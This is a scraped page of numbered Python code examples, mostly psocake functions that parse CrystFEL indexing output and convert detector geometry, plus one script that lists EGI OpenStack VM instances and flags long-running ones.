                    numReflections = endReflectionLine-startReflectionLine

                    columns = ['fs', 'ss', 'res', 'intensity', 'asic']
                    peaks = content[startLine:endLine + 1]
                    myPeaks = []
                    for line in peaks:
                        myPeaks.append(line.split())
                    df = pd.DataFrame(myPeaks, columns=columns, dtype=float)
                    if numReflections > 0:
                        columns = ['h', 'k', 'l', 'I', 'sigma', 'peak', 'background', 'fs', 'ss', 'panel']
                        reflections = content[startReflectionLine:endReflectionLine + 1]
                        myReflections = []
                        for line in reflections:
                            myReflections.append(line.split())
                        dfRefl = pd.DataFrame(myReflections, columns=columns, dtype=float)
                    f.close()

                    # Convert predicted spots to CrystFEL coordinates
                    if self.parent.facility == self.parent.facilityLCLS:
                        columnsPeaks = ['x', 'y', 'psocakeX', 'psocakeY']
                        dfPeaks = pd.DataFrame(np.empty((numReflections, len(columnsPeaks))), columns=columnsPeaks)
                        for i in np.arange(numReflections):
                            myAsic = dfRefl['panel'][i].strip()
                            x = (dfRefl['fs'][i] - dfGeom.loc[myAsic, 'min_fs']) * dfScan.loc[myAsic, 'fsx'] + \
                                (dfRefl['ss'][i] - dfGeom.loc[myAsic, 'min_ss']) * dfScan.loc[myAsic, 'ssx']
                            x += dfGeom.loc[myAsic, 'corner_x']
                            y = (dfRefl['fs'][i] - dfGeom.loc[myAsic, 'min_fs']) * dfScan.loc[myAsic, 'fsy'] + \
                                (dfRefl['ss'][i] - dfGeom.loc[myAsic, 'min_ss']) * dfScan.loc[myAsic, 'ssy']
                            y += dfGeom.loc[myAsic, 'corner_y']
                            dfPeaks['x'][i] = x
                            dfPeaks['y'][i] = y
                        # Convert to psocake coordinates
                        for i in np.arange(numReflections):
                            dfPeaks['psocakeX'][i] = self.parent.cx - dfPeaks['x'][i]
                            dfPeaks['psocakeY'][i] = self.parent.cy + dfPeaks['y'][i]
                    elif self.parent.facility == self.parent.facilityPAL:
                        columnsPeaks = ['x', 'y', 'psocakeX', 'psocakeY']
                        dfPeaks = pd.DataFrame(np.empty((numReflections, len(columnsPeaks))), columns=columnsPeaks)
                        # Convert to psocake coordinates
                        for i in np.arange(numReflections):
                            dfPeaks['psocakeX'][i] = dfRefl['ss'][i]
                            dfPeaks['psocakeY'][i] = dfRefl['fs'][i]
                    if self.parent.index.showIndexedPeaks and self.eventNumber == self.parent.eventNumber:
                        self.parent.index.numIndexedPeaksFound = numReflections
                        self.parent.index.indexedPeaks = dfPeaks[['psocakeX', 'psocakeY']].as_matrix()
                        self.parent.index.drawIndexedPeaks(self.latticeType, self.centering, self.unitCell) #FIXME: segfaults when indexing twice
                        try:
                            print "####################"
                            print "lattice_type = ", str(self.latticeType.strip())
                            print "centering = ", str(self.centering.strip())
                            print "unique_axis = ", str(self.uniqueAxis.strip())
                            print "a = ", str(round(float(self.unitCell[0])*10, 2)), " A"
                            print "b = ", str(round(float(self.unitCell[1])*10, 2)), " A"
                            print "c = ", str(round(float(self.unitCell[2])*10, 2)), " A"
                            print "al = ", str(round(float(self.unitCell[3]), 2)), " deg"
                            print "be = ", str(round(float(self.unitCell[4]), 2)), " deg"
                            print "ga = ", str(round(float(self.unitCell[5]), 2)), " deg"
                            print "####################"
                        except:
                            print "Could not print unit cell"
            else:
                print "Indexing requirement not met."
                if self.parent.pk.numPeaksFound < self.minPeaks: print "Decrease minimum number of peaks"
                if self.parent.pk.numPeaksFound > self.maxPeaks: print "Increase maximum number of peaks"
                if self.parent.pk.peaksMaxRes < self.minRes: print "Decrease minimum resolution"
Example #29
def main():

    # Get the user's settings
    env = get_settings()
    verbose = env["VERBOSE"]
    print("Verbose Level = %s" % colourise("cyan", verbose))

    # Initialize the OIDC token from the EGI AAI Check-In service.
    token = get_OIDC_Token(
        env["checkin_auth_url"],
        env["checkin_client_id"],
        env["checkin_client_secret"],
        env["checkin_refresh_token"],
    )

    # Loading the configuration settings of the EGI training providers
    providers = load_provider_settings(env["PROVIDERS_SETTINGS_FILENAME"])

    for index in range(0, len(providers)):
        # Parsing the providers JSON object
        provider_name = providers[index]["provider"]["hostname"]
        provider_identity = providers[index]["provider"]["identity"]
        provider_compute = providers[index]["provider"]["compute"]
        provider_project_id = providers[index]["provider"]["project_id"]

        print("[.] Reading settings of the resource provider: %s " %
              provider_name)
        print("%s" % json.dumps(providers[index], indent=4, sort_keys=False))

        # Protocol fix:
        if ("INFN-CLOUD-BARI" in provider_name or "BIFI" in provider_name
                or "EODC" in provider_name or "CSTCLOUD-EGI" in provider_name
                or "GWDG-CLOUD" in provider_name):
            protocol = "oidc"
        else:
            protocol = "openid"

        # Retrieve an OpenStack scoped token
        scoped_token = get_scoped_Token(
            provider_identity,
            provider_project_id,
            get_unscoped_Token(provider_identity, token, protocol),
        )

        # print(scoped_token)

        # Get the list of the running servers in the selected provider
        instances = get_running_instances(provider_compute,
                                          provider_project_id, scoped_token)
        # print("\n%s" %json.dumps(instances, indent=4, sort_keys=False))

        index = 1
        if len(instances["servers"]) > 0:
            print(
                "\n[+] Total VM instance(s) running in the resource provider = [#%s]"
                % len(instances["servers"]))
            if verbose == "DEBUG":
                print(instances["servers"])
            for index in range(0, len(instances["servers"])):
                if instances["servers"][index]["links"]:
                    # Get the instance_id
                    instance_id = instances["servers"][index]["id"]

                    # Get the usage data for the server
                    # diagnostics = get_instance_diagnostics(provider_compute, instance_id, scoped_token)
                    # print(diagnostics)

                    # Get the server metadata
                    vm_details = get_instance_metadata(provider_compute,
                                                       instance_id,
                                                       scoped_token)
                    # print("\n%s" %json.dumps(vm_details, indent=4, sort_keys=False))
                    if vm_details:
                        created = vm_details["server"]["created"]
                        status = vm_details["server"]["status"]
                        instance_name = vm_details["server"]["name"]

                        # Retrieve the list of network interfaces of the instance
                        ip_details = get_instance_ip(provider_compute,
                                                     instance_id, scoped_token)
                        # print("\n%s" %json.dumps(ip_details, indent=4, sort_keys=False))
                        for key in ip_details["addresses"]:
                            # Get the nmax of addresses
                            nmax = len(ip_details["addresses"][key])
                            ip_address = ip_details["addresses"][key][
                                nmax - 1]["addr"]

                        # Retrieve the flavor details
                        flavor_id = vm_details["server"]["flavor"]["id"]
                        flavor_details = get_flavor(provider_compute,
                                                    flavor_id, scoped_token)
                        # print("\n%s" %json.dumps(flavor_details, indent=4, sort_keys=False))
                        if flavor_details[0] == 200:
                            flavor_name = flavor_details[1]["flavor"]["name"]
                            flavor_vcpus = flavor_details[1]["flavor"]["vcpus"]
                            flavor_ram = flavor_details[1]["flavor"]["ram"]
                            flavor_disk = flavor_details[1]["flavor"]["disk"]

                        # Print VM instance metadata
                        print("_" + "_" * 60)
                        print("- instance name = %s " % instance_name)
                        print("- instance_id   = %s " % instance_id)
                        if "ACTIVE" in status:
                            color = "green"
                        elif "BUILD" in status:
                            color = "yellow"
                        else:
                            color = "red"
                        print("- status        = %s " %
                              colourise(color, status))
                        print("- ip address    = %s " % ip_address)
                        if flavor_details[0] == 200:
                            print(
                                "- image flavor  = %s with %s vCPU cores, %s of RAM and %sGB of local disk "
                                % (flavor_name, flavor_vcpus, flavor_ram,
                                   flavor_disk))
                        print("- created at    = %s " % created)

                        # Check the lifetime of the running instance
                        created = dt.datetime.strptime(created,
                                                       "%Y-%m-%dT%H:%M:%SZ")
                        created_utc = timezone("UCT").localize(created)
                        time_utc = dt.datetime.now(timezone("UCT"))
                        duration = (time_utc -
                                    created_utc).total_seconds() / 3600
                        print("- elapsed time  = %s (hours)" %
                              format(duration, ".2f"))

                        user_id = vm_details["server"]["user_id"]
                        # Get the (real) user from Keystone
                        user_details = get_user(provider_identity, user_id,
                                                scoped_token)

                        if user_details:
                            username = user_details["user"]["name"]
                            print("- created by    = %s " % username)
                        else:
                            print("- created by    = %s " % user_id)

                        if status == "ACTIVE":
                            if (int(duration) > int(
                                    env["MAX_OFFSET"])) or int(duration) == -1:
                                text = "\n[-] WARNING: The VM instance elapsed time exceed the max offset!"
                                print(colourise("cyan", text))

                                text = (
                                    "[-] Deleting of the instance [%s] in progress..."
                                )
                                print(
                                    highlight(
                                        "red",
                                        text %
                                        instance_id[-36:len(instance_id)],
                                    ))
                                # delete_instance(provider_compute, instance_id, scoped_token)

                        index = index + 1

        else:
            print(
                colourise("yellow",
                          "- No VMs instances found in the resource provider"))

        print("")
Example #30
 def deployCrystfelGeometry(self, arg):
     if arg == self.parent.facilityLCLS:
         self.findPsanaGeometry()
         if self.calibFile is not None and self.parent.writeAccess:
             # Convert psana geometry to crystfel geom
             if ('cspad' in self.parent.detInfo.lower() and 'cxi' in self.parent.experimentName) or \
                ('cspad' in self.parent.detInfo.lower() and 'mfx' in self.parent.experimentName):
                 if '.temp.geom' in self.parent.index.geom:
                     self.parent.index.p9.param(
                         self.parent.index.index_grp,
                         self.parent.index.index_geom_str).setValue(
                             self.parent.psocakeRunDir + '/.temp.geom')
                     cmd = [
                         "psana2crystfel",
                         self.calibPath + '/' + self.calibFile,
                         self.parent.psocakeRunDir + "/.temp.geom",
                         str(self.parent.coffset)
                     ]
                     if self.parent.args.v >= 1: print "cmd: ", cmd
                     try:
                         p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
                         p.communicate()[0]
                         p.stdout.close()
                     except:
                         print highlight(
                             "Warning! deployCrystfelGeometry() failed.",
                             'r', 1)
                     # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'r') as f:
                         lines = f.readlines()
                     newGeom = []
                     for line in lines:
                         if '; mask =' in line:
                             #newGeom.append('mask_file = ' + self.parent.psocakeRunDir + '/staticMask.h5\n')
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_good =' in line:
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_bad =' in line:
                             newGeom.append(line.split('; ')[-1])
                         else:
                             newGeom.append(line)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'w') as f:
                         lines = f.writelines(newGeom)
             elif 'rayonix' in self.parent.detInfo.lower(
             ) and 'mfx' in self.parent.experimentName:
                 if '.temp.geom' in self.parent.index.geom:
                     # Set GUI field to .temp.geom
                     self.parent.index.p9.param(
                         self.parent.index.index_grp,
                         self.parent.index.index_geom_str).setValue(
                             self.parent.psocakeRunDir + '/.temp.geom')
                     cmd = [
                         "psana2crystfel",
                         self.calibPath + '/' + self.calibFile,
                         self.parent.psocakeRunDir + "/.temp.geom",
                         str(self.parent.coffset)
                     ]
                     if self.parent.args.v >= 1: print "cmd: ", cmd
                     try:
                         p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
                         p.communicate()[0]
                         p.stdout.close()
                     except:
                         print highlight(
                             "Warning! deployCrystfelGeometry() failed.",
                             'r', 1)
                     # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'r') as f:
                         lines = f.readlines()
                     newGeom = []
                     for line in lines:
                         if '; mask =' in line:
                             # newGeom.append('mask_file = ' + self.parent.psocakeRunDir + '/staticMask.h5\n')
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_good =' in line:
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_bad =' in line:
                             newGeom.append(line.split('; ')[-1])
                         else:
                             newGeom.append(line)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'w') as f:
                         lines = f.writelines(newGeom)
             elif 'rayonix' in self.parent.detInfo.lower(
             ) and 'xpp' in self.parent.experimentName:
                 if '.temp.geom' in self.parent.index.geom:
                     # Set GUI field to .temp.geom
                     self.parent.index.p9.param(
                         self.parent.index.index_grp,
                         self.parent.index.index_geom_str).setValue(
                             self.parent.psocakeRunDir + '/.temp.geom')
                     cmd = [
                         "psana2crystfel",
                         self.calibPath + '/' + self.calibFile,
                         self.parent.psocakeRunDir + "/.temp.geom",
                         str(self.parent.coffset)
                     ]
                     if self.parent.args.v >= 1: print "cmd: ", cmd
                     try:
                         p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
                         p.communicate()[0]
                         p.stdout.close()
                     except:
                         print highlight(
                             "Warning! deployCrystfelGeometry() failed.",
                             'r', 1)
                     # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'r') as f:
                         lines = f.readlines()
                     newGeom = []
                     for line in lines:
                         if '; mask =' in line:
                             # newGeom.append('mask_file = ' + self.parent.psocakeRunDir + '/staticMask.h5\n')
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_good =' in line:
                             newGeom.append(line.split('; ')[-1])
                         elif '; mask_bad =' in line:
                             newGeom.append(line.split('; ')[-1])
                         else:
                             newGeom.append(line)
                     with open(self.parent.psocakeRunDir + '/.temp.geom',
                               'w') as f:
                         lines = f.writelines(newGeom)
             else:
                 if self.parent.args.v >= 1:
                     print "deployCrystfelGeometry not implemented", self.parent.detInfo.lower(
                     ), self.parent.experimentName
     elif arg == self.parent.facilityPAL:
         if '.temp.geom' in self.parent.index.geom:
             self.parent.index.p9.param(
                 self.parent.index.index_grp,
                 self.parent.index.index_geom_str).setValue(
                     self.parent.psocakeRunDir + '/.temp.geom')
             # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
             with open(self.parent.psocakeRunDir + '/.temp.geom', 'r') as f:
                 lines = f.readlines()
             newGeom = []
             for line in lines:
                 if '; mask =' in line:
                     # newGeom.append('mask_file = ' + self.parent.psocakeRunDir + '/staticMask.h5\n')
                     newGeom.append(line.split('; ')[-1])
                 elif '; mask_good =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; mask_bad =' in line:
                     newGeom.append(line.split('; ')[-1])
                 else:
                     newGeom.append(line)
             with open(self.parent.psocakeRunDir + '/.temp.geom', 'w') as f:
                 lines = f.writelines(newGeom)
Example #31
    def reportResults(self, id, eventNumber, out, err):

        if 'command not found' in err:
            print("######################################################################")
            print(highlight("FATAL ERROR: I can't find indexamajig on this machine. Refer to:      ", 'r', 1))
            print(highlight("https://confluence.slac.stanford.edu/display/PSDM/Psocake+SFX+tutorial", 'r', 1))
            print("######################################################################")

        if self.indexCounter == id: # only report results if id matches current index counter
            mySuccessString = self.getSuccessStr()

            # Read CrystFEL geometry in stream
            if mySuccessString in err:  # success
                if self.parent.args.v >= 1: print("Indexing successful!")
                # Munging geometry file
                f = open(self.parent.index.hiddenCrystfelStream)
                content = f.readlines()
                try:
                    for i, val in enumerate(content):
                        if '----- Begin geometry file -----' in val:
                            startLine = i
                        elif '----- End geometry file -----' in val:
                            endLine = i
                            break
                    geom = content[startLine:endLine]
                    numLines = endLine - startLine
                except:
                    geom = content[0]  # This shouldn't happen
                    numLines = 0
                # Remove comments
                for i in np.arange(numLines - 1, -1, -1):  # Start from bottom
                    if geom[i].lstrip(' ').startswith(';'): geom.pop(i)

                columns = ['min_fs', 'min_ss', 'max_fs', 'max_ss', 'res', 'fs', 'ss', 'corner_x', 'corner_y']
                columnsScan = ['fsx', 'fsy', 'ssx', 'ssy']
                indexScan = []
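                # Build the per-panel name list: CSPAD panels are named q<quad>a<asic>, the other detectors use p<panel>a<asic>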
                if 'cspad' in self.parent.detInfo.lower():
                    numQuads = 4
                    numAsics = 16
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            indexScan.append('q' + str(i) + 'a' + str(j))
                elif 'rayonix' in self.parent.detInfo.lower():
                    numQuads = 1
                    numAsics = 1
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            indexScan.append('p' + str(i) + 'a' + str(j))
                elif 'epix10k' in self.parent.detInfo.lower() and '2m' in self.parent.detInfo.lower():
                    numQuads = 16
                    numAsics = 4
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            indexScan.append('p' + str(i) + 'a' + str(j))
                elif 'jungfrau4m' in self.parent.detInfo.lower():
                    numQuads = 8
                    numAsics = 8
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            indexScan.append('p' + str(i) + 'a' + str(j))

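                # dfGeom holds the raw geometry values per panel; dfScan holds the fs/ss direction components parsed from the 'fs'/'ss' strings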
                dfGeom = pd.DataFrame(np.empty((numQuads * numAsics, len(columns))), index=indexScan,
                                      columns=columns)
                dfScan = pd.DataFrame(np.empty((numQuads * numAsics, len(columnsScan))), index=indexScan,
                                      columns=columnsScan)
                counter = 0
                for i in np.arange(numQuads):
                    for j in np.arange(numAsics):
                        myAsic = indexScan[counter]
                        for k in columns:
                            myLine = [s for s in geom if myAsic + '/' + k in s]
                            if myLine:  # sometimes elements in columns can be missing
                                myVal = myLine[-1].split('=')[-1].rstrip().lstrip()
                                if k == 'fs' or k == 'ss':
                                    dfGeom.loc[myAsic, k] = myVal
                                else:
                                    dfGeom.loc[myAsic, k] = float(myVal)
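                                # 'fs'/'ss' values are direction strings such as '+0.005x +1.000y'; split out the x and y components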
                                if k == 'fs':
                                    fsx = float(myVal.split('x')[0])
                                    fsy = float(myVal.split('x')[-1].split('y')[0])
                                    dfScan.loc[myAsic, 'fsx'] = fsx
                                    dfScan.loc[myAsic, 'fsy'] = fsy
                                elif k == 'ss':
                                    ssx = float(myVal.split('x')[0])
                                    ssy = float(myVal.split('x')[-1].split('y')[0])
                                    dfScan.loc[myAsic, 'ssx'] = ssx
                                    dfScan.loc[myAsic, 'ssy'] = ssy
                            else:
                                if self.parent.args.v >= 1: print(myAsic + '/' + k + " doesn't exist")
                        counter += 1
                f.close()
            else:
                if eventNumber == self.parent.eventNumber: # if user is still on the same event
                    print("Indexing failed")
                    self.drawIndexedPeaks()

            # Read CrystFEL indexed peaks
            if mySuccessString in str(err):  # success
                with open(self.parent.index.hiddenCrystfelStream) as f:
                    content = f.readlines()
                    for i, val in enumerate(content):
                        if 'End of peak list' in val:
                            endLine = i - 1
                        elif 'indexed_by =' in val:
                            self.indexingAlg = val.split('=')[-1]
                        elif 'num_saturated_reflections =' in val:
                            self.numSaturatedPeaks = int(val.split('=')[-1])
                        elif 'lattice_type =' in val:
                            self.latticeType = val.split('=')[-1]
                        elif 'centering =' in val:
                            self.centering = val.split('=')[-1]
                        elif 'unique_axis =' in val:
                            self.uniqueAxis = val.split('=')[-1]
                        elif 'fs/px   ss/px (1/d)/nm^-1   Intensity  Panel' in val:
                            startLine = i + 1
                        elif 'Cell parameters' in val:
                            (_, _, a, b, c, _, al, be, ga, _) = val.split()
                            self.unitCell = (a, b, c, al, be, ga)
                        elif 'diffraction_resolution_limit =' in val:
                            (_, _, _, _, _, resLim, _) = val.split()  # Angstrom
                        elif 'End of reflections' in val:
                            endReflectionLine = i - 1
                        elif '   h    k    l          I   sigma(I)       peak background  fs/px  ss/px panel' in val:
                            startReflectionLine = i + 1
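                    # startLine/endLine bracket the peak list, startReflectionLine/endReflectionLine the reflection list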
                    numPeaks = endLine - startLine
                    numReflections = endReflectionLine - startReflectionLine

                    columns = ['fs', 'ss', 'res', 'intensity', 'asic']
                    peaks = content[startLine:endLine + 1]
                    myPeaks = []
                    for line in peaks:
                        myPeaks.append(line.split())
                    df = pd.DataFrame(myPeaks, columns=columns, dtype=float)
                    if numReflections > 0:
                        columns = ['h', 'k', 'l', 'I', 'sigma', 'peak', 'background', 'fs', 'ss', 'panel']
                        reflections = content[startReflectionLine:endReflectionLine + 1]
                        myReflections = []
                        for line in reflections:
                            myReflections.append(line.split())
                        dfRefl = pd.DataFrame(myReflections, columns=columns, dtype=float)

                # Convert predicted spots to CrystFEL coordinates
                columnsPeaks = ['x', 'y', 'psocakeX', 'psocakeY']
                dfPeaks = pd.DataFrame(np.empty((numReflections, len(columnsPeaks))), columns=columnsPeaks)
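                # Project each reflection's panel-local (fs, ss) offset onto the panel's fs/ss direction vectors and add the panel corner to get detector x/y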
                for i in np.arange(numReflections):
                    myAsic = dfRefl['panel'][i].strip()
                    x = (dfRefl['fs'][i] - dfGeom.loc[myAsic, 'min_fs']) * dfScan.loc[myAsic, 'fsx'] + \
                        (dfRefl['ss'][i] - dfGeom.loc[myAsic, 'min_ss']) * dfScan.loc[myAsic, 'ssx']
                    x += dfGeom.loc[myAsic, 'corner_x']
                    y = (dfRefl['fs'][i] - dfGeom.loc[myAsic, 'min_fs']) * dfScan.loc[myAsic, 'fsy'] + \
                        (dfRefl['ss'][i] - dfGeom.loc[myAsic, 'min_ss']) * dfScan.loc[myAsic, 'ssy']
                    y += dfGeom.loc[myAsic, 'corner_y']
                    dfPeaks.loc[i, 'x'] = x
                    dfPeaks.loc[i, 'y'] = y
                # Convert to psocake coordinates
                for i in np.arange(numReflections):
                    dfPeaks.loc[i, 'psocakeX'] = self.parent.cy - dfPeaks.loc[i, 'x']
                    dfPeaks.loc[i, 'psocakeY'] = self.parent.cx + dfPeaks.loc[i, 'y']

                if self.parent.index.showIndexedPeaks and eventNumber == self.parent.eventNumber:
                    # if self.parent.mouse.movie is None: # display gif
                    #    self.parent.mouse.tm.start(3000)  # ms
                    self.parent.index.numIndexedPeaksFound = numReflections
                    self.parent.index.indexedPeaks = dfPeaks[['psocakeX', 'psocakeY']].to_numpy()
                    self.parent.index.drawIndexedPeaks(self.latticeType, self.centering, self.unitCell)
                    try:
                        print("Indexed_by = ", str(self.indexingAlg.strip()))
                        print("####################")
                        print("lattice_type = ", str(self.latticeType.strip()))
                        print("centering = ", str(self.centering.strip()))
                        print("unique_axis = ", str(self.uniqueAxis.strip()))
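                        # CrystFEL reports cell lengths in nm; multiply by 10 to print Angstrom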
                        print("a = ", str(round(float(self.unitCell[0]) * 10, 2)), " A")
                        print("b = ", str(round(float(self.unitCell[1]) * 10, 2)), " A")
                        print("c = ", str(round(float(self.unitCell[2]) * 10, 2)), " A")
                        print("al = ", str(round(float(self.unitCell[3]), 2)), " deg")
                        print("be = ", str(round(float(self.unitCell[4]), 2)), " deg")
                        print("ga = ", str(round(float(self.unitCell[5]), 2)), " deg")
                        print("####################")
                    except:
                        print("Could not print unit cell")
        else:
            print("stale indexing results: ", self.indexCounter, id)